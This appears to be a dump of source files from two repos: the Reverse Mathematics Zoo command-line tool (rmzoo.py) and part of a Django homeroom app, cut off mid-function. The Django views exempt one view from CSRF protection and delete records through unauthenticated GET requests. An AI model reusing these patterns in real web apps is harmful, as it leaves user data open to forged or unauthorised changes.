RCA -> w\n\n_R_WEAKER[Reduction.sc] |= Reduction.c # sc -> c\n_R_WEAKER[Reduction.c] |= Reduction.w # c -> w\n\n_R_WEAKER[Reduction.sW] |= Reduction.W | Reduction.sc # sW -> W, sc\n_R_WEAKER[Reduction.W] |= Reduction.gW | Reduction.c # W -> gW, c\n_R_WEAKER[Reduction.gW] |= Reduction.w # gW -> w\n\n_completeImplications(Reduction, _R_WEAKER)\n\n_R_STRONGER = _reverseImplications(Reduction, _R_WEAKER)\n\nReduction.weaker = lambda r: _R_WEAKER[r]\nReduction.stronger = lambda r: _R_STRONGER[r]\n\n_F_STRONGER = {f:f for f in Form}\n\n_F_STRONGER[Form.Pi13] |= Form.Pi12 # Pi12 implies Pi13\n_F_STRONGER[Form.Pi12] |= Form.rPi12 # rPi12 implies Pi12\n_F_STRONGER[Form.rPi12] |= Form.Pi11 # Pi11 implies rPi12\n_F_STRONGER[Form.Pi11] |= Form.Sig04 # Sig04 implies Pi11\n_F_STRONGER[Form.Pi11] |= Form.Pi04 # Pi04 implies Pi11\n_F_STRONGER[Form.Pi11] |= Form.uPi03 # uPi03 implies Pi11\n_F_STRONGER[Form.Sig04] |= Form.Sig03 # Sig03 implies Sig04\n_F_STRONGER[Form.Sig04] |= Form.Pi03 # Pi03 implies Sig04\n_F_STRONGER[Form.Pi04] |= Form.Sig03 # Sig03 implies Pi04\n_F_STRONGER[Form.Pi04] |= Form.Pi03 # Pi03 implies Pi04\n_F_STRONGER[Form.uPi03] |= Form.Pi03 # Pi03 implies uPi03\n_F_STRONGER[Form.Sig03] |= Form.Sig02 # Sig02 implies Sig03\n_F_STRONGER[Form.Sig03] |= Form.Pi02 # Pi02 implies Sig03\n_F_STRONGER[Form.Pi03] |= Form.Sig02 # Sig02 implies Pi03\n_F_STRONGER[Form.Pi03] |= Form.Pi02 # Pi02 implies Pi03\n\n_completeImplications(Form, _F_STRONGER)\n\n_F_WEAKER = _reverseImplications(Form, _F_STRONGER)\n\nForm.weaker = lambda f: _F_WEAKER[f]\nForm.stronger = lambda f: _F_STRONGER[f]" }, { "alpha_fraction": 0.5429601073265076, "alphanum_fraction": 0.5495439171791077, "avg_line_length": 35.15292739868164, "blob_id": "bb8d0339eca1975cee5ce7190ec57473c133537f", "content_id": "610a686931b1850467b07d354d59878a44733d7b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27188, "license_type": "permissive", "max_line_length": 179, "num_lines": 752, "path": "/rmzoo.py", "repo_name": "TonichaC/rmzoo", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\n##################################################################################\n#\n# The Reverse Mathematics Zoo\n# by Damir Dzhafarov\n# - Version 1.0 started August, 2010\n# - Version 2.0 started August, 2013\n# Revised by Eric Astor\n# - Version 3.0 - 29 May 2016\n# - Version 4.0 - started 30 May 2016\n# - Version 4.1 - optimizations & refactoring, started 2 July 2016\n# - Version 4.2 - new forms and reasoning, started 12 July 2016\n# - Version 4.3 - changed internal representations, started 21 July 2016\n# - Version 4.4 - moved to a shelf database, started 25 July 2016\n# - Version 5.0 - clean implementation of inference rules, started 1 August 2016\n# - Version 5.1 - reverted from shelf database for cross-platform compatibility, started 16 August 2016\n# Documentation and support: http://rmzoo.uconn.edu\n#\n##################################################################################\n\nfrom __future__ import print_function\n\nimport os, sys\n\nimport itertools\nfrom io import open\nfrom collections import defaultdict\n\nfrom version_guard import isString\n\nimport zlib\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n\nfrom rmupdater import standardizeFact\n\ndef eprint(*args, **kwargs):\n print(*args, file=sys.stderr, **kwargs)\n\nError = False\ndef warning(s):\n global Error\n Error = True\n eprint(s)\n\ndef error(s): # Throw exception\n raise Exception(s)\n\nDate = u'16 August 2016'\nVersion = u'5.1'\nDatabaseVersion = u'5.1'\n\nfrom rmBitmasks import *\nfrom renderJustification import *\n\n_FORM_COLOR = {Form.none: \"white\",\n Form.weaker(Form.Pi11): \"pink\",\n Form.weaker(Form.rPi12): \"cyan\"}\n_CONS_COLOR = {Form.none: \"white\",\n Form.weaker(Form.Pi11): \"pink\",\n Form.weaker(Form.rPi12): \"cyan\"}\n \n##################################################################################\n#\n# GET OPTIONS\n#\n##################################################################################\n \neprint(u'\\nRM Zoo (v{0})'.format(Version))\n\nfrom optparse import OptionParser, OptionGroup\n\nparser = OptionParser(u'Usage: %prog [options] [database]', version=u'%prog {0} ({1})'.format(Version, Date))\n\nparser.set_defaults(implications=False,nonimplications=False,omega=False,onlyprimary=False,weak=False,strong=False,showform=False,conservation=False,add_principles=False)\n\nparser.add_option('-i', action='store_true', dest='implications',\n help=u'Display implications between principles.')\nparser.add_option('-n', action='store_true', dest='nonimplications',\n help=u'Display non-implications between principles.')\nparser.add_option('-w', action='store_true', dest='weak',\n help=u'Display weakest non-redundant open implications.')\nparser.add_option('-s', action='store_true', dest='strong',\n help=u'Display strongest non-redundant open implications.')\nparser.add_option('-t', dest='reducibility', default='RCA',\n help=u'Display facts relative to REDUCIBILITY-implications.')\nparser.add_option('-o', action='store_const', dest='reducibility', const='w',\n help=u'Display only facts that hold in omega models.')\nparser.add_option('-p', action='store_true', dest='onlyprimary',\n help=u'Display only facts about primary principles.')\n \nparser.add_option('-f', action='store_true', dest='showform',\n help=u'Indicate syntactic forms of principles.')\nparser.add_option('-c', action='store_true', dest='conservation',\n help=u'Display known conservation results.')\n \nparser.add_option('-r', dest='restrict_string', metavar='CLASS',\n help=u'Restrict to only the principles in CLASS.')\nparser.add_option('--omit', dest='omit_string', metavar='CLASS',\n help=u'Omit all principles in CLASS.')\n\nparser.add_option('-q', dest='query_string', metavar='FACT',\n help=u'Show whether FACT is known, and if so, its justification.')\nparser.add_option('-F', dest='query_file', metavar='FILE',\n help=u'Query whether all facts in FILE are known, and return a list of all unknown facts.')\n\nparser.add_option('--force', action='store_true', dest='add_principles',\n help=u'Allow queries involving novel conjunctions from the database. (WARNING: slow)')\n\n(options, args) = parser.parse_args()\n\nImplications = options.implications\nNonImplications = options.nonimplications\nWeak = options.weak\nStrong = options.strong\nReducibility = Reduction.fromString(options.reducibility)\nOnlyPrimary = options.onlyprimary\nShowForm = options.showform\nConservation = options.conservation\nRestrict = options.restrict_string\nOmissions = options.omit_string\nif Restrict:\n rSet = set()\n for p in Restrict.split():\n splitP = p.split(u'+')\n setP = set(splitP)\n p = u'+'.join(sorted(setP))\n \n rSet.add(p)\n rSet.update(splitP)\n Restrict = rSet\nif Omissions:\n Omissions = set(Omissions.split())\nQuery = options.query_string\nQueryFile = options.query_file\nAddPrinciples = options.add_principles\n \n# Give errors if bad options chosen\n\nif not Implications and not NonImplications and not OnlyPrimary and not Restrict and not Weak and not Strong and not ShowForm and not Conservation and not Query and not QueryFile:\n parser.error(u'No options selected.')\nif OnlyPrimary:\n if not Implications and not NonImplications and not Weak and not Strong and not ShowForm and not Conservation:\n parser.error(u'Option -p only works if one of -i, -n, -w, -s, -f, or -c is selected.')\nif Restrict or Omissions:\n if Restrict and Omissions:\n parser.error(u'Options -r and --omit are incompatible.')\n if not Implications and not NonImplications and not Weak and not Strong and not ShowForm and not Conservation:\n parser.error(u'Options -r and --omit only work if one of -i, -n, -w, -s, -f, or -c is selected.')\nif Query:\n if Implications or NonImplications or Weak or Strong or ShowForm or Conservation or Restrict or OnlyPrimary or QueryFile:\n parser.error(u'Option -q does not work with any other option (except --force).')\nif QueryFile:\n if Implications or NonImplications or Weak or Strong or ShowForm or Conservation or Restrict or OnlyPrimary or Query:\n parser.error(u'Option -F does not work with any other option (except --force).')\n\nif len(args) > 1:\n parser.error(u'Too many arguments.')\nif len(args) > 0:\n databaseTitle = args[0]\nelse:\n eprint(u'No database title specified; defaulting to \"database\".')\n databaseTitle = 'database'\n\nif os.path.splitext(databaseTitle)[1] == '':\n databaseName = databaseTitle + os.extsep + 'dat'\nelse:\n databaseName = databaseTitle\n\n \n##################################################################################\n#\n# IMPORT AND ORGANIZE DATA\n#\n##################################################################################\n\neprint(u'Importing and organizing data...')\n\nclass VersionError(Exception):\n def __init__(self, targetVersion, actualVersion):\n super(VersionError, self).__init__(u'Version mismatch: found v{0}, targeting v{1}'.format(actualVersion, targetVersion))\n\nprinciples = {}\nimplies, notImplies = {}, {}\nconservative, nonConservative = {}, {}\nform = {}\nprimary, primaryIndex = {}, {}\njustify = {}\ndef getDatabase():\n return {'version': DatabaseVersion,\n 'principles': principles,\n 'implication': (implies, notImplies),\n 'conservation': (conservative, nonConservative),\n 'form': form,\n 'primary': (primary, primaryIndex),\n 'justify': justify}\n\nequivalent = defaultdict(set)\ndef setDatabase(database):\n if database['version'] != DatabaseVersion:\n raise VersionError(DatabaseVersion, database['version'])\n \n global principles\n principles = database['principles']\n \n global implies, notImplies\n implies, notImplies = database['implication']\n \n global equivalent\n for a in principles:\n for b in principles:\n for r in Reduction.list(implies[(a,b)] & implies[(b,a)]):\n equivalent[(a, r)].add(b)\n \n global conservative, nonConservative\n conservative, nonConservative = database['conservation']\n \n global form\n form = database['form']\n \n global primary, primaryIndex\n primary, primaryIndex = database['primary']\n \n global justify\n justify = database['justify']\n\ndef loadDatabase(databaseName, quiet=False):\n with open(databaseName, mode='rb') as databaseFile:\n compressedDatabase = databaseFile.read()\n pickledDatabase = zlib.decompress(compressedDatabase)\n setDatabase(pickle.loads(pickledDatabase))\nloadDatabase(databaseName)\n\ndef knownEquivalent(a, reduction, justification=True):\n if a in principles:\n if justification:\n return (a, None)\n else:\n return a\n \n splitA = a.split(u'+')\n if any((p not in principles) for p in splitA):\n if justification:\n return (None, None)\n else:\n return None\n \n aPrime = None\n for equiv in itertools.product(*(equivalent[(p, reduction)] for p in splitA)):\n aPrime = u'+'.join(sorted(set(equiv)))\n if aPrime in principles:\n if justification:\n equivJst = tuple((p, (reduction, u'<->'), q) for (p,q) in zip(splitA, equiv) if p != q)\n return (aPrime, equivJst)\n else:\n return aPrime\n \n if justification:\n return (None, None)\n else:\n return None\n \ndef queryDatabase(a, op, b, justification=True):\n if op[1] in (u'c', u'nc'):\n reduction = Reduction.RCA\n else:\n reduction = op[0]\n \n if justification:\n aPrime, aJst = knownEquivalent(a, reduction, justification)\n bPrime, bJst = knownEquivalent(b, reduction, justification)\n if aJst is not None:\n justify[(a, (reduction, u'<->'), aPrime)] = aJst\n if bJst is not None:\n justify[(b, (reduction, u'<->'), bPrime)] = bJst\n else:\n aPrime = knownEquivalent(a, reduction, justification)\n bPrime = knownEquivalent(b, reduction, justification)\n \n aKnown = aPrime is not None\n bKnown = bPrime is not None\n \n aConjunct = (not aKnown) and all((p in principles) for p in a.split(u'+'))\n bConjunct = (not bKnown) and all((p in principles) for p in b.split(u'+'))\n \n s = u''\n if not aKnown and not bKnown:\n s += u'{0} and {1} are unknown principles.'.format(a, b)\n elif not aKnown:\n s += u'{0} is an unknown principle.'.format(a)\n elif not bKnown:\n s += u'{0} is an unknown principle.'.format(b)\n if aConjunct and bConjunct:\n s += u'\\n\\tHOWEVER: {0} and {1} are conjunctions of known principles; try running with --force.'.format(a, b)\n elif aConjunct and bKnown:\n s += u'\\n\\tHOWEVER: {0} is a conjunction of known principles; try running with --force.'.format(a)\n elif bConjunct and aKnown:\n s += u'\\n\\tHOWEVER: {0} is a conjunction of known principles; try running with --force.'.format(b)\n if len(s) > 0: error(s)\n \n if (aPrime, op, bPrime) in justify:\n if not justification:\n return True\n else:\n r = []\n if a != aPrime or b != bPrime:\n r.append(u'\\n')\n if a != aPrime:\n r.append(u'NOTE: {0} is not a known principle, but is equivalent to {1}\\n'.format(a, aPrime))\n if b != bPrime:\n r.append(u'NOTE: {0} is not a known principle, but is equivalent to {1}\\n'.format(b, bPrime))\n \n if a != aPrime:\n r.append(printJustification((a, (reduction, u'<->'), aPrime), justify))\n if b != bPrime:\n r.append(printJustification((b, (reduction, u'<->'), bPrime), justify))\n r.append(printJustification((aPrime, op, bPrime), justify))\n return u''.join(r)\n else:\n return False\n\n##################################################################################\n#\n# IF RESTRICT OR QUERY: VALIDATE CLASS\n#\n##################################################################################\n\nif Restrict:\n \n for a in Restrict: # Give warnings if CLASS is not a subset of principles\n if a not in principles:\n error(+a+u' is not in the database.')\n\nif Omissions:\n Restrict = principles - Omissions\n\n##################################################################################\n#\n# IF QUERY: GIVE ANSWER\n#\n##################################################################################\n\nfrom pyparsing import *\n\nname = Word( alphas+\"_+^{}\\\\$\", alphanums+\"_+^{}$\\\\\")\n\n_reductionName = NoMatch()\nfor r in Reduction:\n if r != Reduction.none:\n _reductionName |= Literal(r.name)\nfor r in Reduction.alias:\n if r != u'':\n _reductionName |= Literal(r)\n_reductionType = _reductionName.setParseAction(lambda s,l,t: [Reduction.fromString(t[0])])\nreductionType = Optional(_reductionType, default=Reduction.RCA)\npostfixReductionType = Optional(Suppress(Literal(\"_\")) + _reductionType, default=Reduction.RCA)\n\nimplication = (reductionType + Literal(\"->\")) | (Literal(\"=>\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"->\"])\nnonImplication = (reductionType + Literal(\"-|>\")) | (Literal(\"=/>\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"-|>\"])\nequivalence = (reductionType + Literal(\"<->\")) | (Literal(\"<=>\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"<->\"])\n\nreduction = (Literal(\"<=\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"<=\"])\nnonReduction = (Literal(\"</=\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"</=\"])\n\n_formName = NoMatch()\nfor f in Form:\n if f != Form.none:\n _formName |= Literal(f.name)\nformType = _formName.setParseAction(lambda s,l,t: [Form.fromString(t[0])])\n\nconservation = formType + Literal(\"c\")\nnonConservation = (Literal(\"n\") + formType + Literal(\"c\")).setParseAction(lambda s,l,t: [t[1], \"nc\"])\n\noperator = implication | nonImplication | reduction | nonReduction | equivalence | conservation | nonConservation\n\nif Query:\n query = name + Group(operator) + name + StringEnd()\n Query = query.parseString(Query)\n \n op = Query[1]\n if not isString(op):\n op = tuple(op)\n a, op, b = standardizeFact(Query[0], op, Query[2])\n \n if not (a in principles and b in principles) and AddPrinciples:\n abort = False\n for p in a.split(u'+'):\n if p not in principles:\n abort = True\n break\n for p in b.split(u'+'):\n if p not in principles:\n abort = True\n break\n if not abort:\n eprint(u'Adding new principles...')\n import rmupdater\n rmupdater.setDatabase(getDatabase())\n if a not in principles:\n rmupdater.addPrinciple(a)\n if b not in principles:\n rmupdater.addPrinciple(b)\n rmupdater.principlesList = sorted(rmupdater.principles)\n rmupdater.deriveInferences(quiet=False)\n setDatabase(rmupdater.getDatabase())\n \n jst = queryDatabase(a, op, b)\n if jst:\n print(u'Justification for the fact \"{0}\":\\n{1}'.format(printFact(a, op, b), jst))\n else:\n print(u'\\nError: Unknown fact \"{0}\"'.format(printFact(a, op, b)))\n opp = None # opposite operation\n if op[1] == u'->':\n opp = (op[0], u'-|>')\n elif op[1] == u'-|>':\n opp = (op[0], u'->')\n elif op[1] == u'c':\n opp = (op[0], u'nc')\n elif op[1] == u'nc':\n opp = (op[0], u'c')\n \n if opp is not None:\n jst = queryDatabase(a, opp, b)\n if jst:\n print(u'CONTRADICTING fact known! Justification for the fact \"{0}\":\\n{1}'.format(printFact(a, opp, b), jst))\n if op[1] == u'<->':\n opp = (op[0], u'-|>')\n jst = queryDatabase(a, opp, b)\n if jst:\n print(u'CONTRADICTING fact known! Justification for the fact \"{0}\":\\n{1}'.format(printFact(a, opp, b), jst))\n else:\n jst = queryDatabase(b, opp, a)\n if jst:\n print(u'CONTRADICTING fact known! Justification for the fact \"{0}\":\\n{1}'.format(printFact(b, opp, a), jst))\n\nif QueryFile:\n parenth = Literal('\"')\n justification = QuotedString('\"\"\"',multiline=True) | quotedString.setParseAction(removeQuotes)\n \n fact = name + ((Group(operator) + name + Suppress(Optional(justification))) | (Literal('form') + formType) | (Literal('is') + Literal('primary')))\n \n queries = []\n with open(QueryFile, encoding='utf-8') as f:\n for q in f.readlines():\n q = q.strip()\n if len(q) == 0 or q[0] == u'#': continue\n \n Q = fact.parseString(q)\n if Q[1] == u'is' and Q[2] == u'primary': continue\n \n a,op,b = Q\n if not isString(op):\n op = tuple(op)\n a,op,b = standardizeFact(a, op, b)\n \n queries.append((a, op, b, q))\n \n if AddPrinciples:\n newPrinciples = set()\n unknownPrinciples = set()\n for (a, op, b, q) in queries:\n unknown = False\n \n Q = a.split(u'+')\n if op != u'form':\n Q.extend(b.split(u'+'))\n for p in Q:\n if p not in principles:\n unknownPrinciples.add(p)\n unknown = True\n if not unknown:\n if a not in principles: newPrinciples.add(a)\n if op != u'form' and b not in principles: newPrinciples.add(b)\n \n if len(unknownPrinciples) > 0:\n warning(u'Unknown principles: {0}\\n'.format(u', '.join(sorted(unknownPrinciples))))\n if len(newPrinciples) > 0:\n eprint(u'Adding {0:,d} new principles...'.format(len(newPrinciples)))\n import rmupdater\n rmupdater.setDatabase(getDatabase())\n for p in newPrinciples:\n rmupdater.addPrinciple(p)\n rmupdater.principlesList = sorted(rmupdater.principles)\n rmupdater.deriveInferences(quiet=False)\n setDatabase(rmupdater.getDatabase())\n \n for (a, op, b, q) in queries:\n s = u''\n known = False\n if op == u'form':\n known = Form.isPresent(b, form[a])\n else:\n try:\n known = queryDatabase(a, op, b, justification=False)\n except Exception as e:\n s += u'\\n' + str(e)\n \n if not known:\n s += u'\\nUnknown fact: ' + q\n \n if len(s) > 0:\n warning(s)\n eprint(u'\\nFinished.')\n\n##################################################################################\n#\n# IF RESTRICT: DELETE PRINCIPLES NOT IN CLASS\n#\n##################################################################################\n\nif Restrict:\n principles &= Restrict\n \n##################################################################################\n#\n# IF DIAGRAM: REMOVE REDUNDANT IMPLICATIONS AND NON-IMPLICATIONS \n#\n##################################################################################\n\nif Implications or NonImplications or Weak or Strong:\n\n eprint(u'Removing redundant facts for clarity...')\n \n # Create print versions of functions\n \n simpleImplies = defaultdict(bool)\n printImplies = defaultdict(bool)\n \n simpleNotImplies = defaultdict(bool)\n printNotImplies = defaultdict(bool)\n \n equivalent = defaultdict(bool)\n \n simpleConservative = defaultdict(noForm)\n printConservative = defaultdict(noForm)\n \n printWeakOpen = defaultdict(bool)\n printStrongOpen = defaultdict(bool)\n \n for a in principles:\n for b in principles:\n if a == b: # Remove self-relations to not confuse DOT reader\n continue\n \n simpleImplies[(a,b)] = Reduction.isPresent(Reducibility, implies[(a,b)])\n printImplies[(a,b)] = simpleImplies[(a,b)]\n \n simpleNotImplies[(a,b)] = Reduction.isPresent(Reducibility, notImplies[(a,b)])\n printNotImplies[(a,b)] = simpleNotImplies[(a,b)]\n \n if simpleImplies[(a,b)] and simpleImplies[(b,a)]:\n equivalent[(a,b)] = True\n equivalent[(b,a)] = True\n \n simpleConservative[(a,b)] = conservative[(a,b)]\n printConservative[(a,b)] = simpleConservative[(a,b)]\n \n # Assign primaries and make them unique\n \n for a in sorted(principles):\n currentPrimary = a\n found = False\n toRemove = set()\n for b in primaryIndex:\n if currentPrimary == b:\n found = True\n continue\n if equivalent[(currentPrimary,b)]:\n if found:\n toRemove.add(b)\n else:\n if currentPrimary in primary:\n toRemove.add(currentPrimary)\n currentPrimary = b\n found = True\n if currentPrimary not in primary:\n primary.add(currentPrimary)\n primaryIndex.append(currentPrimary)\n for x in toRemove:\n primaryIndex.remove(x)\n primary.difference_update(toRemove)\n \n for a in principles: # Remove facts involving non-primary principles\n if a not in primary:\n for b in principles:\n printImplies[(a,b)] = False\n printImplies[(b,a)] = False\n \n printNotImplies[(a,b)] = False\n printNotImplies[(b,a)] = False\n \n printConservative[(a,b)] = Form.none\n\n # Remove redundant implications\n \n for a in primary:\n for b in primary:\n for c in primary: # Remove implications obtained by transitivity\n if simpleImplies[(b,a)] and simpleImplies[(a,c)]:\n printImplies[(b,c)] = False\n\n # Remove redundant non-implications\n\n for a in primary:\n for b in primary:\n if b == a: continue\n for c in primary:\n if c == a or c == b: continue\n \n if simpleNotImplies[(a,c)] and simpleImplies[(b,c)]: # If a -|> c, but b -> c, then a -|> b.\n printNotImplies[(a,b)] = False\n if simpleImplies[(c,a)] and simpleNotImplies[(c,b)]: # If c -> a, but c -|> b, then a -|> b.\n printNotImplies[(a,b)] = False\n \n # Remove redundant conservation facts\n\n for a in primary: # Remove conservation results obtained by transitivity\n for b in primary:\n if b == a: continue\n for c in primary:\n if c == a or c == b: continue\n \n if simpleImplies[(a,b)]:\n printConservative[(b,c)] &= ~simpleConservative[(a,c)]\n if simpleImplies[(b,c)]:\n printConservative[(a,b)] &= ~simpleConservative[(a,c)]\n \n # Generate open implications\n\n for a in primary:\n for b in primary:\n if b == a: continue\n \n if not simpleImplies[(a,b)] and not simpleNotImplies[(a,b)]:\n printWeakOpen[(a,b)] = True\n printStrongOpen[(a,b)] = True\n\n for a in primary:\n for b in primary:\n if b == a: continue\n for c in primary:\n if c == a or c == b: continue\n \n if simpleImplies[(c,a)] and not simpleImplies[(c,b)] and not simpleNotImplies[(c,b)]: # c -> a, c ? b\n printWeakOpen[(a,b)] = False\n if simpleImplies[(c,a)] and not simpleImplies[(b,a)] and not simpleNotImplies[(b,a)]: # c -> a, b ? a\n printWeakOpen[(b,c)] = False\n \n if simpleImplies[(a,c)] and not simpleImplies[(c,b)] and not simpleNotImplies[(c,b)]: # a -> c, c ? b\n printStrongOpen[(a,b)] = False\n if simpleImplies[(a,c)] and not simpleImplies[(b,a)] and not simpleNotImplies[(b,a)]: # a -> c, b ? a\n printStrongOpen[(b,c)] = False\n \n # Find all equivalent principles\n \n equivSet = defaultdict(set)\n for a in primary:\n for b in principles:\n if equivalent[(a,b)]:\n equivSet[a].add(b)\n \n##################################################################################\n#\n# IF DIAGRAM: PRINT OUT THE DOT FILE\n#\n################################################################################## \n\nif Implications or NonImplications or Weak or Strong or ShowForm or Conservation:\n\n eprint(u'Printing DOT file...')\n eprint(\"\\tDiagram contains {0} non-equivalent principles.\".format(len(primary)))\n\n print(\"\"\"//\n// RM Zoo (v\"\"\" + Version + \"\"\")\n//\n\ndigraph G {\n\ngraph [\n rankdir = TB // put stronger principles higher up\n ranksep = 1.5\n ]\n\n//\n// Node Styles\n//\n\nnode [shape=none,color=white];\n\n//\n// Data\n//\"\"\")\n\n if Implications:\n \n for a in primary:\n for b in primary:\n if printImplies[(a,b)]:\n style = []\n if printNotImplies[(b,a)] and not NonImplications:\n style.append(u'color = \"black:white:black\"')\n if len(equivSet[a]) > 0 and not OnlyPrimary:\n style.append(u'minlen = 2')\n s = u''\n if len(style) > 0:\n s = u' [{0}]'.format(u', '.join(style))\n print(u'\" {0} \" -> \" {1} \"{2}'.format(a,b,s))\n \n if NonImplications:\n \n for a in primary:\n for b in primary:\n if printNotImplies[(a,b)]:\n print(u'\" {0} \" -> \" {1} \" [color = \"red\"]'.format(a,b))\n \n if not OnlyPrimary:\n for a in primary:\n for b in equivSet[a]:\n print(u'\" {0} \" -> \" {1} \" [dir = both]'.format(a,b))\n \n if Weak:\n for a in primary:\n for b in primary:\n if printWeakOpen[(a,b)]:\n print(u'\" {0} \" -> \" {1} \" [color = \"green\"]'.format(a,b))\n \n if Strong:\n for a in primary:\n for b in primary:\n if printStrongOpen[(a,b)]:\n print(u'\" {0} \" -> \" {1} \" [color = \"orange\"]'.format(a,b))\n \n if ShowForm:\n for a in principles:\n if a in form:\n if form[a] != Form.none:\n print(u'\" {0} \" [shape=box, style=filled, fillcolor={1}]'.format(a, _FORM_COLOR[form[a]]))\n \n \n if Conservation:\n for a in primary:\n for b in primary:\n if a == b: continue\n \n if printConservative[(a,b)] != Form.none:\n print(u'\" {0} \" -> \" {1} \" [color = \"{2}\"]'.format(a,b, _CONS_COLOR[printConservative[(a,b)]]))\n\n print(u'}')\n eprint(u'Finished.')\n\n" } ]
7
MAHT1990/HomeRoom_Project
https://github.com/MAHT1990/HomeRoom_Project
6a653ad946ed41aff5baebe34d2f17e8c4150127
9141ac1d9838b033d79e5add7db91f368c58ea36
b1a584973d1205da924dc61e7a4bedd3786dc6f0
refs/heads/master
2023-02-15T02:11:45.585875
2021-01-05T14:02:06
2021-01-05T14:02:06
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7012835741043091, "alphanum_fraction": 0.7012835741043091, "avg_line_length": 29.60714340209961, "blob_id": "f1cc57a755eec144b7153a8fc69f5c9e23df8168", "content_id": "64daf1646926c522cc340e90536a05348c95db92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 857, "license_type": "no_license", "max_line_length": 64, "num_lines": 28, "path": "/dot/admin.py", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import *\n# Register your models here.\n\[email protected](State)\nclass StateAdmin(admin.ModelAdmin):\n list_display=['id','state']\n list_display_links=['id','state']\n\[email protected](Notice)\nclass NoticeAdmin(admin.ModelAdmin):\n list_display=['id','content']\n list_display_links=['id','content']\n\[email protected](NoticeDetail)\nclass NoticeDetailAdmin(admin.ModelAdmin):\n list_display=['id','detail','notice']\n list_display_links=['id','detail','notice']\n\[email protected](EventSet)\nclass EventSetAdmin(admin.ModelAdmin):\n list_display=['id','dayname','day','lastday','image']\n list_display_links=['id','dayname','image']\n\[email protected](Eval)\nclass EvalAdmin(admin.ModelAdmin):\n list_display=['id','type','dayname','day','lastday','image']\n list_display_links=['id','dayname','image']\n" }, { "alpha_fraction": 0.6913061738014221, "alphanum_fraction": 0.6921461820602417, "avg_line_length": 27.177515029907227, "blob_id": "add6107fde49f9cb54def26040b14385c9f66030", "content_id": "557136a33198621c5835167fbf6089f2abfef710", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5110, "license_type": "no_license", "max_line_length": 98, "num_lines": 169, "path": "/dot/views.py", "repo_name": "MAHT1990/HomeRoom_Project", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import *\n# Create your views here.\n\n\n\ndef page1(request):\n return redirect(\"dot:morning_assemble\")\n\n\ndef calendar(request):\n EventSets = EventSet.objects.all()\n # EventSets 는 queryset임.\n # 여기서 데이터베이스에 접근 할 줄 알지만, 그것이 아니다.\n # queryset 형태로 가져옴 . 데이터베이스에 접근하기 위한 SQL을 담고있는 애.\n # 그러므로 실제로 접근하기 전에 .filter 메쏘드로 필터링을 할 수 있다.\n # queryset.filter 를 이용해서 필터링된 queryset을 또 만들 수 있음.\n # queryset sql을 담고있는 장고를 위한 자료형\n # chaining(특정조건을 계속 거는 것 ; filter)\n # lazy(계속 늦추다가, database에 꼭 필요할 때만 접근한다는 의미)\n\n Evals = Eval.objects.all()\n content = {\n 'EventSets': EventSets,\n 'Evals': Evals,\n }\n\n return render(request, 'dot/calendar.html', content)\n # template으로 넘겨줄 때 데이터베이스에서 자료를 가져옴.\n\n\ndef calendar_next(request):\n return render(request, 'dot/calendar_next.html')\n\n@csrf_exempt\ndef morning_assemble(request):\n States = State.objects.last()\n Notices = Notice.objects.all()\n EventSets = EventSet.objects.all()\n Evals = Eval.objects.all()\n\n response_data = {\n 'status': 200,\n 'msg': 'success',\n 'States': States,\n 'Notices': Notices,\n 'EventSets': EventSets,\n 'Evals': Evals,\n # TODO: EventSets 와 Evals는\n }\n\n return render(request, 'dot/morning_assemble.html', response_data)\n\n\ndef time_table(request):\n return render(request, 'dot/time_table.html')\n\n\ndef create_delete(request):\n States = State.objects.last()\n Notices = Notice.objects.all()\n EventSets = EventSet.objects.all()\n Evals = Eval.objects.all()\n\n content = {\n 'States': States,\n 'Notices': Notices,\n 'EventSets': EventSets,\n 'Evals': Evals,\n }\n return render(request, 'dot/create_delete.html', content)\n\n\n# TODO : API 수정하기 (각 method별로 새로 함수를 짜서 정리한다.)\ndef Create_State(request):\n user_input_state = request.POST.get(\"State_state\")\n\n new_State = State(state=user_input_state)\n new_State.save()\n return HttpResponseRedirect(reverse(\"dot:create_delete\"))\n\n\ndef Create_Notice(request):\n user_input_notice = request.POST.get('Notice_content')\n\n new_Notice = Notice(content=user_input_notice)\n new_Notice.save()\n return HttpResponseRedirect(reverse(\"dot:create_delete\"))\n\n\ndef Create_NoticeDetail(request):\n noticedetail_object_id = request.POST.get(\"Notice_id\")\n noticedetail_object_detail = request.POST.get(\"NoticeDetail_detail\")\n noticedetail_object = Notice.objects.get(id=noticedetail_object_id)\n\n new_noticedetail = NoticeDetail(notice=noticedetail_object, detail=noticedetail_object_detail)\n new_noticedetail.save()\n\n return HttpResponseRedirect(reverse('dot:create_delete'))\n\n\ndef Delete_Notice(request):\n delete_id = request.GET['Notice_id']\n\n delete_Notice = Notice.objects.get(id=delete_id)\n delete_Notice.delete()\n return HttpResponseRedirect(reverse('dot:create_delete'))\n\n\ndef Delete_NoticeDetail(request):\n delete_id = request.GET['NoticeDetail_id']\n\n delete_NoticeDetail = NoticeDetail.objects.get(id=delete_id)\n delete_NoticeDetail.delete()\n return HttpResponseRedirect(reverse('dot:create_delete'))\n\n\ndef Create_EventSet(request):\n # return HttpResponse('add!')\n user_input_day = request.POST.get('EventSet_day')\n user_input_lastday = request.POST.get('EventSet_lastday')\n user_input_dayname = request.POST.get('EventSet_dayname')\n\n new_EventSet = EventSet(\n day=user_input_day,\n lastday=user_input_lastday,\n dayname=user_input_dayname\n )\n new_EventSet.save()\n\n # return redirect(\"dot:morning_assemble\")\n return HttpResponseRedirect(reverse(\"dot:create_delete\"))\n # return HttpResponse(user_input_dayname + user_input_day + user_input_lastday)\n\n\ndef Create_Eval(request):\n user_input_type = request.POST['Eval_type']\n user_input_day = 